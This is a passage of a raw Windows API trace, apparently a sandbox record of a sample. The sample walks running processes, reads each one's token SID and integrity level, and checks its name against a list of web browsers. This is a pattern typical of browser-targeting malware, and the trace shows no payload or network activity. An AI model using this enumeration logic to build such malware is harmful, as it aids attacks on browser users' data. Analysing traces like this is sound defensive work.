returned -1 [0231.125] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0231.125] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0231.125] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.125] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.125] GetLastError () returned 0x7a [0231.126] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.126] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.126] CloseHandle (hObject=0xb8) returned 1 [0231.126] CloseHandle (hObject=0xb4) returned 1 [0231.126] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.126] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.126] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.126] GetLastError () returned 0x7a [0231.126] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.126] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.126] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.126] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0231.126] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0231.126] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0231.127] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0231.127] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0231.127] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0231.127] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0231.127] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.127] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.127] GetLastError () returned 0x7a [0231.127] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.127] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.127] CloseHandle (hObject=0xb8) returned 1 [0231.127] CloseHandle (hObject=0xb4) returned 1 [0231.127] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.128] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.128] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.128] GetLastError () returned 0x7a [0231.128] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.128] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.128] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.128] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0231.128] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0231.128] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0231.128] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0231.128] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0231.128] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0231.128] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0231.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0231.129] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0231.129] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.129] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.129] GetLastError () returned 0x7a [0231.129] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.129] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.129] CloseHandle (hObject=0xb8) returned 1 [0231.129] CloseHandle (hObject=0xb4) returned 1 [0231.129] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.130] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.130] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.130] GetLastError () returned 0x7a [0231.130] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.130] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.130] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.130] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0231.130] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0231.130] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0231.130] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0231.130] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0231.130] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0231.130] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0231.131] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.131] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.131] GetLastError () returned 0x7a [0231.131] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.131] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.131] CloseHandle (hObject=0xb8) returned 1 [0231.131] CloseHandle (hObject=0xb4) returned 1 [0231.131] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.131] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.131] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.131] GetLastError () returned 0x7a [0231.132] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.132] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.132] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.132] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0231.132] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0231.132] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0231.132] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0231.132] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0231.132] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0231.132] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0231.132] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.133] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.133] GetLastError () returned 0x7a [0231.133] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.133] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.133] CloseHandle (hObject=0xb8) returned 1 [0231.133] CloseHandle (hObject=0xb4) returned 1 [0231.133] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.133] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.134] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.134] GetLastError () returned 0x7a [0231.134] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.134] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.134] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.134] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0231.134] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0231.134] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0231.134] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0231.134] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0231.134] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0231.135] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0231.135] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.135] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.135] GetLastError () returned 0x7a [0231.135] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.135] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.135] CloseHandle (hObject=0xb8) returned 1 [0231.135] CloseHandle (hObject=0xb4) returned 1 [0231.135] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.136] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.136] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.136] GetLastError () returned 0x7a [0231.136] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.136] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.136] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.136] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0231.136] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0231.136] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0231.136] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0231.138] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0231.138] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0231.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0231.138] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.138] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.138] GetLastError () returned 0x7a [0231.138] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.138] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.139] CloseHandle (hObject=0xb8) returned 1 [0231.139] CloseHandle (hObject=0xb4) returned 1 [0231.139] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.139] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.139] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.139] GetLastError () returned 0x7a [0231.139] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.139] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.140] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.140] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0231.140] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0231.140] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0231.140] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0231.140] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0231.140] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0231.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0231.140] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.140] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.140] GetLastError () returned 0x7a [0231.141] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.141] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.141] CloseHandle (hObject=0xb8) returned 1 [0231.141] CloseHandle (hObject=0xb4) returned 1 [0231.141] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.141] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.141] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.141] GetLastError () returned 0x7a [0231.142] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.142] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.142] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.142] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0231.142] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0231.142] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0231.142] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0231.142] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0231.142] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0231.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0231.142] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0231.143] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0231.143] GetLastError () returned 0x7a [0231.143] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0231.143] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0231.143] CloseHandle (hObject=0xb8) returned 1 [0231.143] CloseHandle (hObject=0xb4) returned 1 [0231.143] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0231.143] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0231.143] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0231.144] GetLastError () returned 0x7a [0231.144] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0231.144] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0231.144] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0231.144] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0231.144] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0231.144] 